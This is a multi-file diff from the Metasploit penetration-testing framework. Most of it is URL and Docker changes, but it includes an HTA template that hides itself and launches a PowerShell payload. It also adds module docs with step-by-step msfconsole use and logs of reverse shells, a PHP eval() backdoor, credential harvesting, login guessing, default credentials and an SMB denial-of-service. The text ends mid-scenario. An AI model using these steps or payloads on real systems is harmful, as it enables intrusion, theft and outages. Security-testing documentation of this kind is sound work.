%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
|
|
|
@ -23,4 +23,4 @@
|
|||
; ,''-,;' ``-
|
||||
``-..__``--`
|
||||
|
||||
http://metasploit.com%clr
|
||||
https://metasploit.com%clr
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
|
@ -1,8 +1,12 @@
|
|||
<script language="VBScript">
|
||||
window.moveTo -4000, -4000
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
|
||||
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
|
||||
For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
|
||||
If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
|
||||
%{var_shell}.Run "%{powershell}",0
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
window.close()
|
||||
</script>
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
; build with:
|
||||
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
|
||||
|
||||
|
||||
BITS 64
|
||||
org 0
|
||||
ehdr: ; Elf32_Ehdr
|
||||
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
|
||||
db 0, 0, 0, 0, 0, 0, 0, 0 ;
|
||||
dw 2 ; e_type = ET_EXEC for an executable
|
||||
dw 0xB7 ; e_machine = AARCH64
|
||||
dd 0 ; e_version
|
||||
dq _start ; e_entry
|
||||
dq phdr - $$ ; e_phoff
|
||||
dq 0 ; e_shoff
|
||||
dd 0 ; e_flags
|
||||
dw ehdrsize ; e_ehsize
|
||||
dw phdrsize ; e_phentsize
|
||||
dw 1 ; e_phnum
|
||||
dw 0 ; e_shentsize
|
||||
dw 0 ; e_shnum
|
||||
dw 0 ; e_shstrndx
|
||||
|
||||
ehdrsize equ $ - ehdr
|
||||
|
||||
phdr: ; Elf32_Phdr
|
||||
dd 1 ; p_type = PT_LOAD
|
||||
dd 7 ; p_flags = rwx
|
||||
dq 0 ; p_offset
|
||||
dq $$ ; p_vaddr
|
||||
dq $$ ; p_paddr
|
||||
dq 0xDEADBEEF ; p_filesz
|
||||
dq 0xDEADBEEF ; p_memsz
|
||||
dq 0x1000 ; p_align
|
||||
|
||||
phdrsize equ $ - phdr
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
Binary file not shown.
|
@ -188,7 +188,7 @@
|
|||
</div>
|
||||
</div>
|
||||
<div class="footer">
|
||||
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
@ -195,7 +195,7 @@
|
|||
</div>
|
||||
|
||||
<div class="footer">
|
||||
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
|
|
|
@ -24,7 +24,6 @@ RUN apk update && \
|
|||
bison \
|
||||
build-base \
|
||||
ruby-dev \
|
||||
libffi-dev\
|
||||
openssl-dev \
|
||||
readline-dev \
|
||||
sqlite-dev \
|
||||
|
@ -35,7 +34,9 @@ RUN apk update && \
|
|||
yaml-dev \
|
||||
zlib-dev \
|
||||
ncurses-dev \
|
||||
git \
|
||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& gem install bundler \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
|
|
|
@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
|
|||
MSF_PATH=$(dirname $(dirname $path))
|
||||
fi
|
||||
|
||||
if [[ -n "$MSF_BUILD" ]]; then
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml build
|
||||
fi
|
||||
|
||||
cd $MSF_PATH
|
||||
docker-compose run --rm --service-ports ms ./msfvenom "$@"
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
#! /bin/bash
|
||||
|
||||
if [[ -z "$MSF_PATH" ]]; then
|
||||
path=`dirname $0`
|
||||
|
||||
# check for ./docker/msfconsole.rc
|
||||
if [[ ! -f $path/../msfconsole.rc ]] ; then
|
||||
|
||||
# we are not inside the project
|
||||
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
|
||||
|
||||
# determine script path
|
||||
pushd $(dirname $(realpath $0)) > /dev/null
|
||||
path=$(pwd)
|
||||
popd > /dev/null
|
||||
fi
|
||||
MSF_PATH=$(dirname $(dirname $path))
|
||||
fi
|
||||
|
||||
cd $MSF_PATH
|
||||
|
||||
if [[ -n "$MSF_BUILD" ]]; then
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
|
||||
fi
|
||||
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
|
|
@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
|
|||
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
|
||||
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
|
||||
|
||||
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
|
||||
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
|
||||
3. Start bluetoothctl: `bluetoothctl`
|
||||
4. Turn on scanning: `scan on`
|
||||
5. Turn on agent: `agent on`
|
||||
6. Make sure we can see OBDII: `devices`
|
||||
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
|
||||
1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
|
||||
2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
|
||||
3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
|
||||
4. Start bluetoothctl: `bluetoothctl`
|
||||
5. Turn on scanning: `scan on`
|
||||
6. Turn on agent: `agent on`
|
||||
7. Make sure we can see OBDII: `devices`
|
||||
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
|
||||
|
||||
```
|
||||
Attempting to pair with 00:0D:18:AA:AA:AA
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
|
||||
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
|
||||
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
|
||||
|
||||
The module opens over 64,000 connections to the target service, so please make sure
|
||||
your system ULIMIT is set appropriately to handle it. A single host running this module
|
||||
can theoretically consume up to 8GB of memory on the target.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
1. Do: `set RHOST [IP]`
|
||||
1. Do: `run`
|
||||
1. Target should allocate increasing amounts of memory.
|
||||
|
||||
## Scenarios
|
||||
|
||||
###
|
||||
|
||||
```
|
||||
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
|
||||
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
|
||||
RHOST => 192.168.172.138
|
||||
msf auxiliary(smb_loris) >
|
||||
|
||||
msf auxiliary(smb_loris) > run
|
||||
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
|
||||
....
|
||||
```
|
|
@ -0,0 +1,62 @@
|
|||
## Description
|
||||
|
||||
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
|
||||
|
||||
Valid manager credentials are required.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
|
||||
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
|
||||
|
||||
The following software comes with Asterisk preinstalled and can be used for testing purposes:
|
||||
|
||||
* [FreePBX](https://www.freepbx.org/downloads/)
|
||||
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
|
||||
|
||||
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use auxiliary/gather/asterisk_creds`
|
||||
3. Do: `set rhost <RHOST>`
|
||||
4. Do: `set rport <RPORT>` (default: `5038`)
|
||||
5. Do: `set username <USERNAME>` (default: `admin`)
|
||||
6. Do: `set password <PASSWORD>` (default: `amp111`)
|
||||
7. Do: `run`
|
||||
8. You should get credentials
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
|
||||
[+] 172.16.191.229:5038 - Authenticated successfully
|
||||
[*] 172.16.191.229:5038 - Found 9 users
|
||||
|
||||
Asterisk User Credentials
|
||||
=========================
|
||||
|
||||
Username Secret Type
|
||||
-------- ------ ----
|
||||
100 sip
|
||||
103 bbf5d449753391a sip
|
||||
104 273db6cd9ca402f53354 iax2
|
||||
105 secret password sip
|
||||
106 "_" ;) iax2
|
||||
107 123456789 sip
|
||||
108 ~!@#$%^&*()_+{} sip
|
||||
109 antidisestablishment iax2
|
||||
123 y2u.be/VOaZbaPzdsk iax2
|
||||
|
||||
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
## Description
|
||||
|
||||
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
|
||||
|
||||
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
|
||||
|
||||
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
|
||||
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
|
||||
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/scanner/nntp/nntp_login`
|
||||
2. Do: `set RHOSTS [IP]`
|
||||
3. Do: `set RPORT [IP]`
|
||||
4. Do: `run`
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf auxiliary(nntp_login) > run
|
||||
|
||||
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
|
||||
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
|
||||
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
|
||||
[*] Scanned 1 of 2 hosts (50% complete)
|
||||
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
|
||||
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
|
||||
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
|
||||
[*] Scanned 2 of 2 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
@ -0,0 +1,66 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
|
||||
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
|
||||
3. Do: ```run```
|
||||
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
|
||||
|
||||
## Options
|
||||
|
||||
There are three options currently supported that control what security protocols to
|
||||
send in the RDP negotiation request, which can be helpful in identifying RDP
|
||||
endpoints that might be locked down or configured differently:
|
||||
|
||||
**TLS** Set to true to request TLS security support
|
||||
**CredSSP** Set to true to request CredSSP support
|
||||
**EarlyUser** Set to true to request Early User Authorization Result PDU support
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf auxiliary(rdp_scanner) > run
|
||||
|
||||
[+] 10.4.18.26:3389 - Identified RDP
|
||||
[+] 10.4.18.22:3389 - Identified RDP
|
||||
[+] 10.4.18.89:3389 - Identified RDP
|
||||
[+] 10.4.18.9:3389 - Identified RDP
|
||||
[+] 10.4.18.67:3389 - Identified RDP
|
||||
[+] 10.4.18.80:3389 - Identified RDP
|
||||
[+] 10.4.18.34:3389 - Identified RDP
|
||||
[+] 10.4.18.70:3389 - Identified RDP
|
||||
[+] 10.4.18.30:3389 - Identified RDP
|
||||
[+] 10.4.18.76:3389 - Identified RDP
|
||||
[+] 10.4.18.13:3389 - Identified RDP
|
||||
[+] 10.4.18.91:3389 - Identified RDP
|
||||
[+] 10.4.18.5:3389 - Identified RDP
|
||||
[+] 10.4.18.47:3389 - Identified RDP
|
||||
[+] 10.4.18.41:3389 - Identified RDP
|
||||
[+] 10.4.18.105:3389 - Identified RDP
|
||||
[*] Scanned 44 of 256 hosts (17% complete)
|
||||
[*] Scanned 55 of 256 hosts (21% complete)
|
||||
[+] 10.4.18.118:3389 - Identified RDP
|
||||
[+] 10.4.18.108:3389 - Identified RDP
|
||||
[+] 10.4.18.139:3389 - Identified RDP
|
||||
[*] Scanned 94 of 256 hosts (36% complete)
|
||||
[*] Scanned 110 of 256 hosts (42% complete)
|
||||
[+] 10.4.18.157:3389 - Identified RDP
|
||||
[+] 10.4.18.166:3389 - Identified RDP
|
||||
[+] 10.4.18.164:3389 - Identified RDP
|
||||
[+] 10.4.18.170:3389 - Identified RDP
|
||||
[+] 10.4.18.185:3389 - Identified RDP
|
||||
[+] 10.4.18.209:3389 - Identified RDP
|
||||
[+] 10.4.18.188:3389 - Identified RDP
|
||||
[*] Scanned 156 of 256 hosts (60% complete)
|
||||
[+] 10.4.18.237:3389 - Identified RDP
|
||||
[+] 10.4.18.225:3389 - Identified RDP
|
||||
[*] Scanned 186 of 256 hosts (72% complete)
|
||||
[*] Scanned 194 of 256 hosts (75% complete)
|
||||
[*] Scanned 208 of 256 hosts (81% complete)
|
||||
[*] Scanned 253 of 256 hosts (98% complete)
|
||||
[*] Scanned 256 of 256 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,48 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
|
||||
|
||||
This module has been verified against:
|
||||
|
||||
1. 2.19 core 100
|
||||
2. 2.19 core 110 (exploit-db, not metasploit module)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the firewall
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
|
||||
4. Do: ```set password admin``` or whatever it was set to at install
|
||||
5. Do: ```set rhost 10.10.10.10```
|
||||
6. Do: ```set payload cmd/unix/reverse_perl```
|
||||
7. Do: ```set lhost 192.168.2.229```
|
||||
8. Do: ```exploit```
|
||||
9. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/ipfire_oinkcode_exec
|
||||
msf exploit(ipfire_oinkcode_exec) > set password admin
|
||||
password => admin
|
||||
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
|
||||
rhost => 192.168.2.201
|
||||
msf exploit(ipfire_oinkcode_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(ipfire_oinkcode_exec) > check
|
||||
[*] 192.168.2.201:444 The target appears to be vulnerable.
|
||||
msf exploit(ipfire_oinkcode_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
|
||||
id
|
||||
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
||||
whoami
|
||||
nobody
|
||||
```
|
|
@ -0,0 +1,31 @@
|
|||
## Vulnerable Application
|
||||
|
||||
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey`
|
||||
3. Do: `set rhost 1.2.3.4`
|
||||
4. Do: `exploit`
|
||||
5. You should get a shell.
|
||||
6. Type: `sudo -s` to become root user
|
||||
|
||||
## Scenarios
|
||||
|
||||
This is a run against a known vulnerable vSphere Data Protection appliance.
|
||||
|
||||
```
|
||||
msf > use exploit/linux/ssh/vmware_vdp_known_privkey
|
||||
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4
|
||||
rhost => 1.2.3.4
|
||||
msf exploit(vmware_vdp_known_privkey) > run
|
||||
|
||||
[+] Successful login
|
||||
[*] Found shell.
|
||||
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100
|
||||
```
|
||||
|
||||
## Further Information
|
||||
|
||||
The default account of the appliance is root:changeme
|
|
@ -0,0 +1,55 @@
|
|||
## Description
|
||||
|
||||
This module exploits an unauthenticated remote PHP code execution vulnerability in [IBM OpenAdmin Tool](https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.oat.doc/ids_oat.htm) included with IBM Informix versions 11.5, 11.7, and 12.1.
|
||||
|
||||
The *welcomeServer* SOAP service does not properly validate user input in the *new_home_page* parameter of the *saveHomePage* method allowing arbitrary PHP code to be written to the *config.php* file. The *config.php* file is executed in most pages within the application, and accessible directly via the web root, resulting in code execution.
|
||||
|
||||
**Note: If malformed PHP code is written to the *config.php* file the application fails to process subsequent requests to set *new_home_page*, rendering the application unexploitable.**
|
||||
|
||||
For this reason, the module first writes a PHP `eval()` backdoor to the *config.php* file, then the payload is provided as PHP code in a HTTP POST request for execution.
|
||||
|
||||
By default, a backup of the existing *config.php* is written to *BAKconfig.php*. Replacing the *config.php* file with *BAKconfig.php* will remove the backdoor.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The IBM® OpenAdmin Tool (OAT) for Informix® is a web application for administering and analyzing the performance of IBM Informix database servers. You can administer multiple database server instances from a single OAT installation on a web server. You can access the web server through any browser to administer all your database servers.
|
||||
|
||||
This module has been tested successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
|
||||
|
||||
* [Informix 12.10 Developer Edition SLES 11 virtual appliance demo (Developer Edition 32 bit) VMware Workstation](https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec`
|
||||
3. Do: `set rhost [IP]`
|
||||
4. Do: `run`
|
||||
5. You should get a session
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) Virtual Appliance
|
||||
|
||||
```
|
||||
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > check
|
||||
[*] 172.16.191.208:80 The target service is running, but could not be validated.
|
||||
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.208:80 Wrote backdoor to config.php file successfully
|
||||
[*] Sending stage (33986 bytes) to 172.16.191.208
|
||||
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.208:39840) at 2017-05-31 08:01:49 -0400
|
||||
[!] 172.16.191.208:80 Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : informixva
|
||||
OS : Linux informixva 2.6.27.39-0.3-vmi #1 SMP 2009-11-23 12:57:38 +0100 i686
|
||||
Meterpreter : php/linux
|
||||
meterpreter > getuid
|
||||
Server username: daemon (2)
|
||||
meterpreter >
|
||||
```
|
||||
|
|
@ -0,0 +1,142 @@
|
|||
## Description
|
||||
|
||||
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
|
||||
|
||||
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Metasploit 4.15 on Kali 1.0.6
|
||||
* Metasploit 4.14 on Kali 2017.1
|
||||
* Metasploit 4.14 on Windows 7 SP1
|
||||
|
||||
Source and Installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/multi/misc/msf_rpc_console`
|
||||
3. Do: `set RHOST [IP]`
|
||||
4. Do: `set RPORT [PORT]` (default: `55552`)
|
||||
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
|
||||
6. Do: `set PASSWORD [PASSWORD]`
|
||||
7. Do: `set LHOST [IP]`
|
||||
8. Do: `run`
|
||||
9. You should get a session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**Username**
|
||||
|
||||
The username for Metasploit RPC (default: `msf`).
|
||||
|
||||
**Password**
|
||||
|
||||
The password for the RPC user.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ruby Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
|
||||
rhost => 172.16.191.166
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 0
|
||||
target => 0
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.166:55552 - Authenticated successfully
|
||||
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
|
||||
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
|
||||
[*] 172.16.191.166:55552 - API version 1.0
|
||||
[+] 172.16.191.166:55552 - Created console #0
|
||||
[*] 172.16.191.166:55552 - Sending payload...
|
||||
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
|
||||
|
||||
whoami
|
||||
win-sgbsd5tqutq\user
|
||||
```
|
||||
|
||||
### Windows CMD Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
|
||||
rhost => 172.16.191.166
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 0
|
||||
target => 1
|
||||
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
|
||||
payload => cmd/windows/powershell_reverse_tcp
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse SSL handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.166:55552 - Authenticated successfully
|
||||
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
|
||||
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
|
||||
[*] 172.16.191.166:55552 - API version 1.0
|
||||
[+] 172.16.191.166:55552 - Created console #1
|
||||
[*] 172.16.191.166:55552 - Sending payload...
|
||||
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
|
||||
|
||||
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
|
||||
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
|
||||
|
||||
PS C:\metasploit>whoami
|
||||
win-sgbsd5tqutq\user
|
||||
```
|
||||
|
||||
### Unix CMD Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
